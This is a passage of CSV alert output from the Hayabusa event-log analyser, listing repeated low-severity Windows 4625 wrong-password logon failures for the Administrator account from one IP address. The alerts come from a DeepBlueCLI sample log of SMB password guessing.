Wrong Password,User: Administrator | Type: 3 | Computer: OtcZ4ymkeLHeU7YJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.620 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZxZCDKWtqkGJ0dnw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.666 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: f4GGnhttZgmRPRJo | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.716 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gI0j9w45eXEFeex3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.764 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BVZ2YRDUAOsNgKxo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.822 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VJfIpxlcwVf7pWga | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.858 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Oerixd9ODF6fslsC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.920 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sbJC5yvrIymYgaHY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.951 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4schZcUP8Im8Ee1e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.988 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WotargyGlEq9PBch | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.025 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2JSMrPoucOR0nzlD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.064 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jr4w4uoF2DVZ5n9x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.104 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v319oZIaOBpuf542 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.151 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GNRTL9BLlGWMx6dA | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.192 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zHlDIOZ9B5uY8Rzz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dr2bvAue8mr5kagX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.284 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pXBds9GoXr6IZUfp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.327 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aLYuegjXO18lo342 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.367 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: To3MMEEvNXKNjKHT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.416 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: N0HCToTmh3ESGBYt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.455 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nNvBueVo3ANNmSSN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.499 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mVWOoAG5ermGL2Gl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.545 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: W7QYJUNPm5b4jprh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.590 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PHllwNJvpH3P97cp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.632 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tfT8GtafHGYMlkMf | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.680 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nab7wtZfBVkcynsa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.733 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VHiijj7sT9nyqxii | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.780 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v06kkhqYNOyEHx2c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.820 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WSTDX16YK5Zgkjxo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.861 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u6QWEyTrpndCagP0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.914 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7iCaXa5SR5IHJnQA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.956 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DNZhcPd1JaNFZMYG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LeOIg10KS60QplWz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.036 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: um3Nwo2doDbKJJvz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.150 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JuoqbUwc2Nth1xlH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.199 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WF8zKIbeboTLLkC6 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.237 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kSyKc8igfuYLMekV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.285 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LHog0TdOci9CCKBa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.328 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: R5ilFaQlemZUSNun | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.374 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JOJnv9vFdqr2VSQC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.421 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rXaoVN7FvJ5rRDUF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.482 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kaFCT5QYFfmJpEC1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.547 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kOdVfL4XUTLp60tC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.597 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wFQSXjz0JTlkwpBu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.634 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sgAVlnENp6IzRRDr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.697 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JLkeKKFVP5vJjPtl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.751 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EqLXdGmr45vGpu3E | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.801 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m7uTpMLqPgenJdRb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.852 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FQn7NqRzpGtjQdfv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.901 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8F8EZLHQtEWkeob1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.936 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5joxW81M9vcAfbJw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.988 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iMfmQF3xsaV5SQVZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.040 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QQe9VL8eeco0SdPW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.080 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MnMbxQEuczrnMLKc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.137 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3DWOiTIp6JQLq9Vz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.180 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E1ORteg467kiFxmD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.216 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EoVhHZ2lkyAEx0w9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.260 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IMSqYaVVGR5v3bXr | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.298 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hEEJ05nL0lyatWKL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.349 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SgrcS1NqwVJSEv31 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.395 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CCNTu1A6c6myngXd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.434 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YLx5Hv5GmdvsO9SE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.468 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VtS3KUkTVoAWGqbW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.512 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7DxfDEwc6ykrmddu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.552 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m8yKyocZwOY574pe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.596 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JfdmcsxnDHRxJYAA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.649 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: euxBOcdse8NjSzTd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.696 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dw7RZh5jKuRcM1xw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.742 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zIyozsYA1Mn27gl7 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.786 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vhJopROjHZi6T8aF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.822 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QZ6XuZO6fIMg52tV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.870 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tvAYEepvDwz93ezW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.919 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6Er95vLjet49OmSQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.960 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OKkMGZ5on5L26cip | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.000 
